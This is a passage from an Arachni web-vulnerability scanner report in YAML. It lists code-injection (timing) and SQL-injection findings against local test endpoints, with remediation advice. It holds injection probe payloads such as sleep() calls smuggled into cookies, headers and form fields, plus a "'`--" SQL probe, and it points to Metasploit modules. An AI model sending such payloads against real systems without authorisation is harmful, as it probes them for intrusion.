  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: cookie
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/perl/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=++sleep(8000/1000)%3B
      response: {}

    id: 
    injected: "  sleep(8000/1000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: "  sleep(__TIME__/1000);"
      :skip_orig: true
      :injected_orig: "  sleep(8000/1000);"
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: "  sleep(8000/1000);"
      :injected: "  sleep(8000/1000);"
      :combo: 
        cookie: "  sleep(8000/1000);"
      :action: http://localhost:7470/perl/cookie/straight
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/perl/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: header
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/perl/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: " &&  sleep(8000/1000);"
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: " &&  sleep(8000/1000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: " &&  sleep(__TIME__/1000);"
      :skip_orig: true
      :injected_orig: " &&  sleep(8000/1000);"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: " &&  sleep(8000/1000);"
      :injected: " &&  sleep(8000/1000);"
      :combo: 
        User-Agent: " &&  sleep(8000/1000);"
      :action: http://localhost:7470/perl/header/straight
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/perl/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: form
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: POST
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/ruby/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: "  sleep(8000/1000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: POST
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: "  sleep(__TIME__/1000);"
      :skip_orig: true
      :injected_orig: "  sleep(8000/1000);"
      :altered: input
      :element: form
      :params: 
        input: "  sleep(8000/1000);"
      :follow_location: true
      :injected: "  sleep(8000/1000);"
      :combo: 
        input: "  sleep(8000/1000);"
      :action: http://localhost:7470/ruby/form/straight
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/ruby/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: link
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/ruby/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: "  sleep(8000/1000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: "  sleep(__TIME__/1000);"
      :skip_orig: true
      :injected_orig: "  sleep(8000/1000);"
      :altered: input
      :element: link
      :params: 
        input: "  sleep(8000/1000);"
      :follow_location: true
      :injected: "  sleep(8000/1000);"
      :combo: 
        input: "  sleep(8000/1000);"
      :action: http://localhost:7470/ruby/link/straight?input=default
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/ruby/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: cookie
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/ruby/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=++sleep(8000/1000)%3B
      response: {}

    id: 
    injected: "  sleep(8000/1000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: "  sleep(__TIME__/1000);"
      :skip_orig: true
      :injected_orig: "  sleep(8000/1000);"
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: "  sleep(8000/1000);"
      :injected: "  sleep(8000/1000);"
      :combo: 
        cookie: "  sleep(8000/1000);"
      :action: http://localhost:7470/ruby/cookie/straight
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/ruby/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: header
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/ruby/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: " &&  sleep(8000/1000);"
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: " &&  sleep(8000/1000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: " &&  sleep(__TIME__/1000);"
      :skip_orig: true
      :injected_orig: " &&  sleep(8000/1000);"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: " &&  sleep(8000/1000);"
      :injected: " &&  sleep(8000/1000);"
      :combo: 
        User-Agent: " &&  sleep(8000/1000);"
      :action: http://localhost:7470/ruby/header/straight
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/ruby/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/oracle/form/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "151"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: java.sql.SQLException
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:java\.sql\.SQLException)
      :match: java.sql.SQLException
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: form
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/oracle/form/flip
      :verification: false
      :id: java.sql.SQLException
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:java\.sql\.SQLException)
    regexp_match: java.sql.SQLException
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"(PLS|ORA)-[0-9][0-9][0-9][0-9]\\njava.sql.SQLException\\nOracle error\\nOracle stuff Driver\\nWarning stuff oci_ stuff\\nWarning stuff ora_ stuff\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/oracle/form/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/oracle/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "136"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: java.sql.SQLException
    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:java\.sql\.SQLException)
      :match: java.sql.SQLException
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: form
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/oracle/form/append
      :verification: false
      :id: java.sql.SQLException
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:java\.sql\.SQLException)
    regexp_match: java.sql.SQLException
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      (PLS|ORA)-[0-9][0-9][0-9][0-9]
      java.sql.SQLException
      Oracle error
      Oracle stuff Driver
      Warning stuff oci_ stuff
      Warning stuff ora_ stuff

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/oracle/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/oracle/link/flip?input=default
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "151"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: java.sql.SQLException
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:java\.sql\.SQLException)
      :match: java.sql.SQLException
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: link
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/oracle/link/flip?input=default
      :verification: false
      :id: java.sql.SQLException
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:java\.sql\.SQLException)
    regexp_match: java.sql.SQLException
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"(PLS|ORA)-[0-9][0-9][0-9][0-9]\\njava.sql.SQLException\\nOracle error\\nOracle stuff Driver\\nWarning stuff oci_ stuff\\nWarning stuff ora_ stuff\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/oracle/link/flip?input=default
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/oracle/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "136"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: java.sql.SQLException
    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:java\.sql\.SQLException)
      :match: java.sql.SQLException
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: link
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/oracle/link/append?input=default
      :verification: false
      :id: java.sql.SQLException
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:java\.sql\.SQLException)
    regexp_match: java.sql.SQLException
    remedy_code: ""
